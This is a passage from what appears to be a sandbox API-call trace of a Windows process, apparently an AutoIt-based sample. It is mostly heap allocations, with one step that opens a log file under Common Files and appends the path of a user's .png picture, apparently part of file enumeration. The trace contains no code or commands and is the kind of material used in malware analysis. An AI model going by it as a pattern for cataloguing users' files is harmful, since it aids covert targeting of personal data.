(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0191.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0191.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0191.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0191.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.091] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.091] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0191.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.091] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.091] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.091] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0191.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.092] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0191.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.092] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0191.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0191.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0191.093] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3150, lpOverlapped=0x0) returned 1 [0191.093] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0191.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3150, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0191.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0191.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.flyingship.png\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0191.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4e) returned 0x9238c0 [0191.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.flyingship.png\r\n", cchWideChar=78, lpMultiByteStr=0x9238c0, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 78 [0191.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0191.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0191.094] WriteFile (in: hFile=0x158, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4d, lpOverlapped=0x0) returned 1 [0191.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0191.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.094] CloseHandle (hObject=0x158) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0191.095] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0191.095] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0191.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.097] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.097] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.097] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.097] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0191.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0191.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0191.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0191.098] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0191.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0191.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0191.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0191.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0191.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0191.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0191.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 